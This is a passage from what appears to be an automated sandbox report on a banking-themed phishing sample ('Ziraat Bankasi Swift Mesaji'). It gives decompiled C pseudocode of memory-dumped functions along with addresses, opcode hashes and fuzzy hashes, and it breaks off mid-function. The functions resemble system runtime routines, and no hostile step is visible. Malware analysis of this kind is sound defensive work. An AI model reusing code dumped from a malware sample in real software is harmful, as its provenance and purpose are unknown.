                                                                    • Instruction Fuzzy Hash: 47717071E0021AEFDB15DFA8C984EEEBBB9FF88710F104569E509E7250D734AA41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 39%
                                                                    			E0192B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				signed int _t80;
                                                                    				signed int _t83;
                                                                    				intOrPtr _t89;
                                                                    				signed int _t92;
                                                                    				signed char _t106;
                                                                    				signed int* _t107;
                                                                    				intOrPtr _t108;
                                                                    				intOrPtr _t109;
                                                                    				signed int _t114;
                                                                    				void* _t115;
                                                                    				void* _t117;
                                                                    				void* _t119;
                                                                    				void* _t122;
                                                                    				signed int _t123;
                                                                    				signed int* _t124;
                                                                    
                                                                    				_t106 = _a12;
                                                                    				if((_t106 & 0xfffffffc) != 0) {
                                                                    					return 0xc000000d;
                                                                    				}
                                                                    				if((_t106 & 0x00000002) != 0) {
                                                                    					_t106 = _t106 | 0x00000001;
                                                                    				}
                                                                    				_t109 =  *0x1987b9c; // 0x0
                                                                    				_t124 = L018B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                    				if(_t124 != 0) {
                                                                    					 *_t124 =  *_t124 & 0x00000000;
                                                                    					_t124[1] = _t124[1] & 0x00000000;
                                                                    					_t124[4] = _t124[4] & 0x00000000;
                                                                    					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                    						L13:
                                                                    						_push(_t124);
                                                                    						if((_t106 & 0x00000002) != 0) {
                                                                    							_push(0x200);
                                                                    							_push(0x28);
                                                                    							_push(0xffffffff);
                                                                    							_t122 = E018D9800();
                                                                    							if(_t122 < 0) {
                                                                    								L33:
                                                                    								if((_t124[4] & 0x00000001) != 0) {
                                                                    									_push(4);
                                                                    									_t64 =  &(_t124[1]); // 0x4
                                                                    									_t107 = _t64;
                                                                    									_push(_t107);
                                                                    									_push(5);
                                                                    									_push(0xfffffffe);
                                                                    									E018D95B0();
                                                                    									if( *_t107 != 0) {
                                                                    										_push( *_t107);
                                                                    										E018D95D0();
                                                                    									}
                                                                    								}
                                                                    								_push(_t124);
                                                                    								_push(0);
                                                                    								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                    								L37:
                                                                    								L018B77F0();
                                                                    								return _t122;
                                                                    							}
                                                                    							_t124[4] = _t124[4] | 0x00000002;
                                                                    							L18:
                                                                    							_t108 = _a8;
                                                                    							_t29 =  &(_t124[0x105]); // 0x414
                                                                    							_t80 = _t29;
                                                                    							_t30 =  &(_t124[5]); // 0x14
                                                                    							_t124[3] = _t80;
                                                                    							_t123 = 0;
                                                                    							_t124[2] = _t30;
                                                                    							 *_t80 = _t108;
                                                                    							if(_t108 == 0) {
                                                                    								L21:
                                                                    								_t112 = 0x400;
                                                                    								_push( &_v8);
                                                                    								_v8 = 0x400;
                                                                    								_push(_t124[2]);
                                                                    								_push(0x400);
                                                                    								_push(_t124[3]);
                                                                    								_push(0);
                                                                    								_push( *_t124);
                                                                    								_t122 = E018D9910();
                                                                    								if(_t122 != 0xc0000023) {
                                                                    									L26:
                                                                    									if(_t122 != 0x106) {
                                                                    										L40:
                                                                    										if(_t122 < 0) {
                                                                    											L29:
                                                                    											_t83 = _t124[2];
                                                                    											if(_t83 != 0) {
                                                                    												_t59 =  &(_t124[5]); // 0x14
                                                                    												if(_t83 != _t59) {
                                                                    													L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                    												}
                                                                    											}
                                                                    											_push( *_t124);
                                                                    											E018D95D0();
                                                                    											goto L33;
                                                                    										}
                                                                    										 *_a16 = _t124;
                                                                    										return 0;
                                                                    									}
                                                                    									if(_t108 != 1) {
                                                                    										_t122 = 0;
                                                                    										goto L40;
                                                                    									}
                                                                    									_t122 = 0xc0000061;
                                                                    									goto L29;
                                                                    								} else {
                                                                    									goto L22;
                                                                    								}
                                                                    								while(1) {
                                                                    									L22:
                                                                    									_t89 =  *0x1987b9c; // 0x0
                                                                    									_t92 = L018B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                    									_t124[2] = _t92;
                                                                    									if(_t92 == 0) {
                                                                    										break;
                                                                    									}
                                                                    									_t112 =  &_v8;
                                                                    									_push( &_v8);
                                                                    									_push(_t92);
                                                                    									_push(_v8);
                                                                    									_push(_t124[3]);
                                                                    									_push(0);
                                                                    									_push( *_t124);
                                                                    									_t122 = E018D9910();
                                                                    									if(_t122 != 0xc0000023) {
                                                                    										goto L26;
                                                                    									}
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                    								}
                                                                    								_t122 = 0xc0000017;
                                                                    								goto L26;
                                                                    							}
                                                                    							_t119 = 0;
                                                                    							do {
                                                                    								_t114 = _t124[3];
                                                                    								_t119 = _t119 + 0xc;
                                                                    								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                    								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                    								_t123 = _t123 + 1;
                                                                    								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                    							} while (_t123 < _t108);
                                                                    							goto L21;
                                                                    						}
                                                                    						_push(0x28);
                                                                    						_push(3);
                                                                    						_t122 = E0189A7B0();
                                                                    						if(_t122 < 0) {
                                                                    							goto L33;
                                                                    						}
                                                                    						_t124[4] = _t124[4] | 0x00000001;
                                                                    						goto L18;
                                                                    					}
                                                                    					if((_t106 & 0x00000001) == 0) {
                                                                    						_t115 = 0x28;
                                                                    						_t122 = E0192E7D3(_t115, _t124);
                                                                    						if(_t122 < 0) {
                                                                    							L9:
                                                                    							_push(_t124);
                                                                    							_push(0);
                                                                    							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                    							goto L37;
                                                                    						}
                                                                    						L12:
                                                                    						if( *_t124 != 0) {
                                                                    							goto L18;
                                                                    						}
                                                                    						goto L13;
                                                                    					}
                                                                    					_t15 =  &(_t124[1]); // 0x4
                                                                    					_t117 = 4;
                                                                    					_t122 = E0192E7D3(_t117, _t15);
                                                                    					if(_t122 >= 0) {
                                                                    						_t124[4] = _t124[4] | 0x00000001;
                                                                    						_v12 = _v12 & 0x00000000;
                                                                    						_push(4);
                                                                    						_push( &_v12);
                                                                    						_push(5);
                                                                    						_push(0xfffffffe);
                                                                    						E018D95B0();
                                                                    						goto L12;
                                                                    					}
                                                                    					goto L9;
                                                                    				} else {
                                                                    					return 0xc0000017;
                                                                    				}
                                                                    			}




















                                                                    0x0192b8d9
                                                                    0x0192b8e4
                                                                    0x00000000
                                                                    0x0192b8e6
                                                                    0x0192b8f3
                                                                    0x0192b8f5
                                                                    0x0192b8f5
                                                                    0x0192b8f8
                                                                    0x0192b920
                                                                    0x0192b924
                                                                    0x0192b936
                                                                    0x0192b939
                                                                    0x0192b93d
                                                                    0x0192b948
                                                                    0x0192b9a0
                                                                    0x0192b9a0
                                                                    0x0192b9a4
                                                                    0x0192b9bf
                                                                    0x0192b9c4
                                                                    0x0192b9c6
                                                                    0x0192b9cd
                                                                    0x0192b9d1
                                                                    0x0192bad4
                                                                    0x0192bad8
                                                                    0x0192bada
                                                                    0x0192badc
                                                                    0x0192badc
                                                                    0x0192badf
                                                                    0x0192bae0
                                                                    0x0192bae2
                                                                    0x0192bae4
                                                                    0x0192baec
                                                                    0x0192baee
                                                                    0x0192baf0
                                                                    0x0192baf0
                                                                    0x0192baec
                                                                    0x0192bafb
                                                                    0x0192bafc
                                                                    0x0192bafe
                                                                    0x0192bb01
                                                                    0x0192bb01
                                                                    0x00000000
                                                                    0x0192bb06
                                                                    0x0192b9d7
                                                                    0x0192b9db
                                                                    0x0192b9db
                                                                    0x0192b9de
                                                                    0x0192b9de
                                                                    0x0192b9e4
                                                                    0x0192b9e7
                                                                    0x0192b9ea
                                                                    0x0192b9ec
                                                                    0x0192b9ef
                                                                    0x0192b9f3
                                                                    0x0192ba1b
                                                                    0x0192ba1b
                                                                    0x0192ba23
                                                                    0x0192ba24
                                                                    0x0192ba27
                                                                    0x0192ba2a
                                                                    0x0192ba2b
                                                                    0x0192ba2e
                                                                    0x0192ba30
                                                                    0x0192ba37
                                                                    0x0192ba3f
                                                                    0x0192ba9c
                                                                    0x0192baa2
                                                                    0x0192bb13
                                                                    0x0192bb15
                                                                    0x0192baae
                                                                    0x0192baae
                                                                    0x0192bab3
                                                                    0x0192bab5
                                                                    0x0192baba
                                                                    0x0192bac8
                                                                    0x0192bac8
                                                                    0x0192baba
                                                                    0x0192bacd
                                                                    0x0192bacf
                                                                    0x00000000
                                                                    0x0192bacf
                                                                    0x0192bb1a
                                                                    0x00000000
                                                                    0x0192bb1c
                                                                    0x0192baa7
                                                                    0x0192bb11
                                                                    0x00000000
                                                                    0x0192bb11
                                                                    0x0192baa9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0192ba41
                                                                    0x0192ba41
                                                                    0x0192ba41
                                                                    0x0192ba58
                                                                    0x0192ba5d
                                                                    0x0192ba62
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0192ba64
                                                                    0x0192ba67
                                                                    0x0192ba68
                                                                    0x0192ba69
                                                                    0x0192ba6c
                                                                    0x0192ba6f
                                                                    0x0192ba71
                                                                    0x0192ba78
                                                                    0x0192ba80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0192ba90
                                                                    0x0192ba90
                                                                    0x0192ba97
                                                                    0x00000000
                                                                    0x0192ba97
                                                                    0x0192b9f5
                                                                    0x0192b9f7
                                                                    0x0192b9f7
                                                                    0x0192b9fa
                                                                    0x0192ba03
                                                                    0x0192ba07
                                                                    0x0192ba0c
                                                                    0x0192ba10
                                                                    0x0192ba17
                                                                    0x00000000
                                                                    0x0192b9f7
                                                                    0x0192b9a6
                                                                    0x0192b9a8
                                                                    0x0192b9af
                                                                    0x0192b9b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0192b9b9
                                                                    0x00000000
                                                                    0x0192b9b9
                                                                    0x0192b94d
                                                                    0x0192b98f
                                                                    0x0192b995
                                                                    0x0192b999
                                                                    0x0192b960
                                                                    0x0192b967
                                                                    0x0192b968
                                                                    0x0192b96a
                                                                    0x00000000
                                                                    0x0192b96a
                                                                    0x0192b99b
                                                                    0x0192b99e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0192b99e
                                                                    0x0192b951
                                                                    0x0192b954
                                                                    0x0192b95a
                                                                    0x0192b95e
                                                                    0x0192b972
                                                                    0x0192b979
                                                                    0x0192b97d
                                                                    0x0192b97f
                                                                    0x0192b980
                                                                    0x0192b982
                                                                    0x0192b984
                                                                    0x00000000
                                                                    0x0192b984
                                                                    0x00000000
                                                                    0x0192b926
                                                                    0x00000000
                                                                    0x0192b926

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a73ae928e93cd5fbf1a954444ccbf76d855d5d659f4b1c311176f781d656a603
                                                                    • Instruction ID: 018279ab94c726720f5a89b61be8c4175e745f987b9536ae4b4d2af4e2714d74
                                                                    • Opcode Fuzzy Hash: a73ae928e93cd5fbf1a954444ccbf76d855d5d659f4b1c311176f781d656a603
                                                                    • Instruction Fuzzy Hash: 9A712332600716EFEB32DF19C841F66BBF9EF40725F144928E65A8B6A4DB71E940CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E018952A5(char __ecx) {
                                                                    				char _v20;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				void* _v32;
                                                                    				void* _v36;
                                                                    				void* _v37;
                                                                    				void* _v38;
                                                                    				void* _v40;
                                                                    				void* _v46;
                                                                    				void* _v64;
                                                                    				void* __ebx;
                                                                    				intOrPtr* _t49;
                                                                    				signed int _t53;
                                                                    				short _t85;
                                                                    				signed int _t87;
                                                                    				signed int _t88;
                                                                    				signed int _t89;
                                                                    				intOrPtr _t101;
                                                                    				intOrPtr* _t102;
                                                                    				intOrPtr* _t104;
                                                                    				signed int _t106;
                                                                    				void* _t108;
                                                                    
                                                                    				_t93 = __ecx;
                                                                    				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                    				_push(_t88);
                                                                    				_v29 = __ecx;
                                                                    				_t89 = _t88 | 0xffffffff;
                                                                    				while(1) {
                                                                    					E018AEEF0(0x19879a0);
                                                                    					_t104 =  *0x1988210; // 0x1442d58
                                                                    					if(_t104 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					asm("lock inc dword [esi]");
                                                                    					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                    					E018AEB70(_t93, 0x19879a0);
                                                                    					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                    						_t101 =  *0x7ffe02dc;
                                                                    						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                    						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                    							L9:
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0x90028);
                                                                    							_push(_t108 + 0x20);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push( *((intOrPtr*)(_t104 + 4)));
                                                                    							_t53 = E018D9890();
                                                                    							__eflags = _t53;
                                                                    							if(_t53 >= 0) {
                                                                    								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                    								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                    									E018AEEF0(0x19879a0);
                                                                    									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                    									E018AEB70(0, 0x19879a0);
                                                                    								}
                                                                    								goto L3;
                                                                    							}
                                                                    							__eflags = _t53 - 0xc0000012;
                                                                    							if(__eflags == 0) {
                                                                    								L12:
                                                                    								_t13 = _t104 + 0xc; // 0x1442d65
                                                                    								_t93 = _t13;
                                                                    								 *((char*)(_t108 + 0x12)) = 0;
                                                                    								__eflags = E018CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                    								if(__eflags >= 0) {
                                                                    									L15:
                                                                    									_t102 = _v28;
                                                                    									 *_t102 = 2;
                                                                    									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                    									E018AEEF0(0x19879a0);
                                                                    									__eflags =  *0x1988210 - _t104; // 0x1442d58
                                                                    									if(__eflags == 0) {
                                                                    										__eflags =  *((char*)(_t108 + 0xe));
                                                                    										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                    										 *0x1988210 = _t102;
                                                                    										_t32 = _t102 + 0xc; // 0x0
                                                                    										 *_t95 =  *_t32;
                                                                    										_t33 = _t102 + 0x10; // 0x0
                                                                    										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                    										_t35 = _t102 + 4; // 0xffffffff
                                                                    										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                    										if(__eflags != 0) {
                                                                    											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                    											E01914888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                    										}
                                                                    										E018AEB70(_t95, 0x19879a0);
                                                                    										asm("lock xadd [esi], eax");
                                                                    										if(__eflags == 0) {
                                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                                    											E018D95D0();
                                                                    											L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                    										}
                                                                    										asm("lock xadd [esi], ebx");
                                                                    										__eflags = _t89 == 1;
                                                                    										if(_t89 == 1) {
                                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                                    											E018D95D0();
                                                                    											L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                    										}
                                                                    										_t49 = _t102;
                                                                    										L4:
                                                                    										return _t49;
                                                                    									}
                                                                    									E018AEB70(_t93, 0x19879a0);
                                                                    									asm("lock xadd [esi], eax");
                                                                    									if(__eflags == 0) {
                                                                    										_push( *((intOrPtr*)(_t104 + 4)));
                                                                    										E018D95D0();
                                                                    										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                    										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                    									}
                                                                    									 *_t102 = 1;
                                                                    									asm("lock xadd [edi], eax");
                                                                    									if(__eflags == 0) {
                                                                    										_t28 = _t102 + 4; // 0xffffffff
                                                                    										_push( *_t28);
                                                                    										E018D95D0();
                                                                    										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                    									}
                                                                    									continue;
                                                                    								}
                                                                    								_t93 =  &_v20;
                                                                    								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                    								_t85 = 6;
                                                                    								_v20 = _t85;
                                                                    								_t87 = E018CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                    								__eflags = _t87;
                                                                    								if(_t87 < 0) {
                                                                    									goto L3;
                                                                    								}
                                                                    								 *((char*)(_t108 + 0xe)) = 1;
                                                                    								goto L15;
                                                                    							}
                                                                    							__eflags = _t53 - 0xc000026e;
                                                                    							if(__eflags != 0) {
                                                                    								goto L3;
                                                                    							}
                                                                    							goto L12;
                                                                    						}
                                                                    						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                    						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                    							goto L3;
                                                                    						} else {
                                                                    							goto L9;
                                                                    						}
                                                                    					}
                                                                    					L3:
                                                                    					_t49 = _t104;
                                                                    					goto L4;
                                                                    				}
                                                                    				_t49 = 0;
                                                                    				goto L4;
                                                                    			}

























                                                                    0x018952a5
                                                                    0x018952ad
                                                                    0x018952b0
                                                                    0x018952b3
                                                                    0x018952b7
                                                                    0x018952ba
                                                                    0x018952bf
                                                                    0x018952c4
                                                                    0x018952cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018952ce
                                                                    0x018952d9
                                                                    0x018952dd
                                                                    0x018952e7
                                                                    0x018952f7
                                                                    0x018952f9
                                                                    0x018952fd
                                                                    0x018f0dcf
                                                                    0x018f0dd5
                                                                    0x018f0dd6
                                                                    0x018f0dd7
                                                                    0x018f0dd8
                                                                    0x018f0dd9
                                                                    0x018f0dde
                                                                    0x018f0ddf
                                                                    0x018f0de0
                                                                    0x018f0de1
                                                                    0x018f0de2
                                                                    0x018f0de5
                                                                    0x018f0dea
                                                                    0x018f0dec
                                                                    0x018f0f60
                                                                    0x018f0f64
                                                                    0x018f0f70
                                                                    0x018f0f76
                                                                    0x018f0f79
                                                                    0x018f0f79
                                                                    0x00000000
                                                                    0x018f0f64
                                                                    0x018f0df2
                                                                    0x018f0df7
                                                                    0x018f0e04
                                                                    0x018f0e0d
                                                                    0x018f0e0d
                                                                    0x018f0e10
                                                                    0x018f0e1a
                                                                    0x018f0e1c
                                                                    0x018f0e4c
                                                                    0x018f0e52
                                                                    0x018f0e61
                                                                    0x018f0e67
                                                                    0x018f0e6b
                                                                    0x018f0e70
                                                                    0x018f0e76
                                                                    0x018f0ed7
                                                                    0x018f0edc
                                                                    0x018f0ee0
                                                                    0x018f0ee6
                                                                    0x018f0eea
                                                                    0x018f0eed
                                                                    0x018f0ef0
                                                                    0x018f0ef3
                                                                    0x018f0ef6
                                                                    0x018f0ef9
                                                                    0x018f0efe
                                                                    0x018f0f01
                                                                    0x018f0f01
                                                                    0x018f0f0b
                                                                    0x018f0f12
                                                                    0x018f0f16
                                                                    0x018f0f18
                                                                    0x018f0f1b
                                                                    0x018f0f2c
                                                                    0x018f0f31
                                                                    0x018f0f31
                                                                    0x018f0f35
                                                                    0x018f0f39
                                                                    0x018f0f3a
                                                                    0x018f0f3c
                                                                    0x018f0f3f
                                                                    0x018f0f50
                                                                    0x018f0f55
                                                                    0x018f0f55
                                                                    0x018f0f59
                                                                    0x018952eb
                                                                    0x018952f1
                                                                    0x018952f1
                                                                    0x018f0e7d
                                                                    0x018f0e84
                                                                    0x018f0e88
                                                                    0x018f0e8a
                                                                    0x018f0e8d
                                                                    0x018f0e9e
                                                                    0x018f0ea3
                                                                    0x018f0ea3
                                                                    0x018f0ea7
                                                                    0x018f0eaf
                                                                    0x018f0eb3
                                                                    0x018f0eb9
                                                                    0x018f0eb9
                                                                    0x018f0ebc
                                                                    0x018f0ecd
                                                                    0x018f0ecd
                                                                    0x00000000
                                                                    0x018f0eb3
                                                                    0x018f0e21
                                                                    0x018f0e2b
                                                                    0x018f0e2f
                                                                    0x018f0e30
                                                                    0x018f0e3a
                                                                    0x018f0e3f
                                                                    0x018f0e41
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f0e47
                                                                    0x00000000
                                                                    0x018f0e47
                                                                    0x018f0df9
                                                                    0x018f0dfe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f0dfe
                                                                    0x01895303
                                                                    0x01895307
                                                                    0x00000000
                                                                    0x01895309
                                                                    0x00000000
                                                                    0x01895309
                                                                    0x01895307
                                                                    0x018952e9
                                                                    0x018952e9
                                                                    0x00000000
                                                                    0x018952e9
                                                                    0x0189530e
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14eb27871df7049a54b7f427676d03cfdb0346fd323be7850d422cb373bd7678
                                                                    • Instruction ID: bc856fb53823824a2ab4b503fc58930c6a9548eec5f9127880adaf40ee1adb31
                                                                    • Opcode Fuzzy Hash: 14eb27871df7049a54b7f427676d03cfdb0346fd323be7850d422cb373bd7678
                                                                    • Instruction Fuzzy Hash: 4851BC30105342AFD722EFA8C840B2BBBA5FF90714F14091EF599C7692E770EA04CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                    				signed short* _v8;
                                                                    				signed short* _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr* _v28;
                                                                    				signed int _v32;
                                                                    				signed int _v36;
                                                                    				short _t56;
                                                                    				signed int _t57;
                                                                    				intOrPtr _t58;
                                                                    				signed short* _t61;
                                                                    				intOrPtr _t72;
                                                                    				intOrPtr _t75;
                                                                    				intOrPtr _t84;
                                                                    				intOrPtr _t87;
                                                                    				intOrPtr* _t90;
                                                                    				signed short* _t91;
                                                                    				signed int _t95;
                                                                    				signed short* _t96;
                                                                    				intOrPtr _t97;
                                                                    				intOrPtr _t102;
                                                                    				signed int _t108;
                                                                    				intOrPtr _t110;
                                                                    				signed int _t111;
                                                                    				signed short* _t112;
                                                                    				void* _t113;
                                                                    				signed int _t116;
                                                                    				signed short** _t119;
                                                                    				short* _t120;
                                                                    				signed int _t123;
                                                                    				signed int _t124;
                                                                    				void* _t125;
                                                                    				intOrPtr _t127;
                                                                    				signed int _t128;
                                                                    
                                                                    				_t90 = __ecx;
                                                                    				_v16 = __edx;
                                                                    				_t108 = _a4;
                                                                    				_v28 = __ecx;
                                                                    				_t4 = _t108 - 1; // -1
                                                                    				if(_t4 > 0x13) {
                                                                    					L15:
                                                                    					_t56 = 0xc0000100;
                                                                    					L16:
                                                                    					return _t56;
                                                                    				}
                                                                    				_t57 = _t108 * 0x1c;
                                                                    				_v32 = _t57;
                                                                    				_t6 = _t57 + 0x1988204; // 0x0
                                                                    				_t123 =  *_t6;
                                                                    				_t7 = _t57 + 0x1988208; // 0x1988207
                                                                    				_t8 = _t57 + 0x1988208; // 0x1988207
                                                                    				_t119 = _t8;
                                                                    				_v36 = _t123;
                                                                    				_t110 = _t7 + _t123 * 8;
                                                                    				_v24 = _t110;
                                                                    				_t111 = _a4;
                                                                    				if(_t119 >= _t110) {
                                                                    					L12:
                                                                    					if(_t123 != 3) {
                                                                    						_t58 =  *0x1988450; // 0x0
                                                                    						if(_t58 == 0) {
                                                                    							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                    						}
                                                                    					} else {
                                                                    						_t26 = _t57 + 0x198821c; // 0x0
                                                                    						_t58 =  *_t26;
                                                                    					}
                                                                    					 *_t90 = _t58;
                                                                    					goto L15;
                                                                    				} else {
                                                                    					goto L2;
                                                                    				}
                                                                    				while(1) {
                                                                    					_t116 =  *_t61 & 0x0000ffff;
                                                                    					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                    					if(_t116 == _t128) {
                                                                    						goto L18;
                                                                    					}
                                                                    					L5:
                                                                    					if(_t116 >= 0x61) {
                                                                    						if(_t116 > 0x7a) {
                                                                    							_t97 =  *0x1986d5c; // 0x7f860654
                                                                    							_t72 =  *0x1986d5c; // 0x7f860654
                                                                    							_t75 =  *0x1986d5c; // 0x7f860654
                                                                    							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                    						} else {
                                                                    							_t116 = _t116 - 0x20;
                                                                    						}
                                                                    					}
                                                                    					if(_t128 >= 0x61) {
                                                                    						if(_t128 > 0x7a) {
                                                                    							_t102 =  *0x1986d5c; // 0x7f860654
                                                                    							_t84 =  *0x1986d5c; // 0x7f860654
                                                                    							_t87 =  *0x1986d5c; // 0x7f860654
                                                                    							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                    						} else {
                                                                    							_t128 = _t128 - 0x20;
                                                                    						}
                                                                    					}
                                                                    					if(_t116 == _t128) {
                                                                    						_t61 = _v12;
                                                                    						_t96 = _v8;
                                                                    					} else {
                                                                    						_t113 = _t116 - _t128;
                                                                    						L9:
                                                                    						_t111 = _a4;
                                                                    						if(_t113 == 0) {
                                                                    							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                    							_t33 =  &(_t119[1]); // 0x100
                                                                    							_t120 = _a8;
                                                                    							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                    							_t35 = _t95 - 1; // 0xff
                                                                    							_t124 = _t35;
                                                                    							if(_t120 == 0) {
                                                                    								L27:
                                                                    								 *_a16 = _t95;
                                                                    								_t56 = 0xc0000023;
                                                                    								goto L16;
                                                                    							}
                                                                    							if(_t124 >= _a12) {
                                                                    								if(_a12 >= 1) {
                                                                    									 *_t120 = 0;
                                                                    								}
                                                                    								goto L27;
                                                                    							}
                                                                    							 *_a16 = _t124;
                                                                    							_t125 = _t124 + _t124;
                                                                    							E018DF3E0(_t120, _t115, _t125);
                                                                    							_t56 = 0;
                                                                    							 *((short*)(_t125 + _t120)) = 0;
                                                                    							goto L16;
                                                                    						}
                                                                    						_t119 =  &(_t119[2]);
                                                                    						if(_t119 < _v24) {
                                                                    							L2:
                                                                    							_t91 =  *_t119;
                                                                    							_t61 = _t91;
                                                                    							_v12 = _t61;
                                                                    							_t112 =  &(_t61[_t111]);
                                                                    							_v8 = _t112;
                                                                    							if(_t61 >= _t112) {
                                                                    								break;
                                                                    							} else {
                                                                    								_t127 = _v16 - _t91;
                                                                    								_t96 = _t112;
                                                                    								_v20 = _t127;
                                                                    								_t116 =  *_t61 & 0x0000ffff;
                                                                    								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                    								if(_t116 == _t128) {
                                                                    									goto L18;
                                                                    								}
                                                                    								goto L5;
                                                                    							}
                                                                    						} else {
                                                                    							_t90 = _v28;
                                                                    							_t57 = _v32;
                                                                    							_t123 = _v36;
                                                                    							goto L12;
                                                                    						}
